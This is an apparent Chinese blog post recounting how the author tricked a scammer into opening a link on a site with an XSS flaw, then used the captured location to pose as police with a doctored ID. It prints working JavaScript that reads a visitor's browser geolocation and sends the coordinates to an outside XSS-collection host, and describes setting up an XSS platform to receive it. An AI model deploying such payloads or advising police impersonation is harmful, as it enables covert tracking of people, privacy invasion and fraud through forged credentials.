看我如何帮朋友追回骗款

XSS获取定位技术

Posted by 看不尽的尘埃 on September 22, 2019

前言

最近有个高中同学说他被骗了几百块钱,想要追回钱财,但是现在骗子已经把他删除好友了,然后他来问我有啥办法,他当时把骗子的网站也发我了。于是我就想从Web入手试试,可能是我太渣了吧,只找到了一个XSS漏洞…一个XSS怎么来能追回这笔赃款呢?我想到了通过XSS获取骗子的地理位置,我通过一个小号加上了他,忽悠他说平台有问题,随便发他链接。最终我成功打到了听他的地理位置信息和IP地址!最后炸他说我是W警,顺便靠一手PS证件,一会儿的功夫从他聊天语气上看出来他慌了,2分钟左右钱就到我朋友账号上了。 今天就来说一下,通过XSS如何获取地理位置信息和IP地址,其实这个东西很容易,就是可能比较鸡肋…

过程

我们首先需要去XSS平台注册一个账号,注册完成后就新建一个模块或者有的XSS平台自带定位功能模块。 图片

下面就是JS代码:

function getLocation() 
  {
  if (navigator.geolocation)
    {
    navigator.geolocation.getCurrentPosition(showPosition);
    }
  else{x.innerHTML="Geolocation is not supported by this browser.";}
  }
function showPosition(position)
  {
    (new Image()).src='https://xsshs.cn/xss.php?do=api&id={projectId}&weidu='+position.coords.latitude+'&jingdu='+position.coords.longitude; 
}
       
getLocation();

我就拿我的手机比作骗子的手机来演示一下这个过程。 鸡肋的地方有2个,第一个就是需要允许浏览器获取地理位置,默认我的手机是开着的;第二个就是打开了网页之后会弹窗提示,该网站需要获取你的地理位置。 因为骗子的网站存在XSS漏洞,所以骗子一般都会放下戒心,他肯定会想这是我自己的网站没事的。 图片

图片 哈哈哈,只要他允许了,他的地理位置信息和IP地址马上就会发送到XSS平台上面!

图片

我们可以通过以下网站,填写经纬度进行查询地理位置,一般来说定位是很准的,我本地测试,偏差就50m。 http://www.gpsspg.com/maps.htm

后续

故事纯属虚构,如有雷同,纯属巧合,哈哈哈!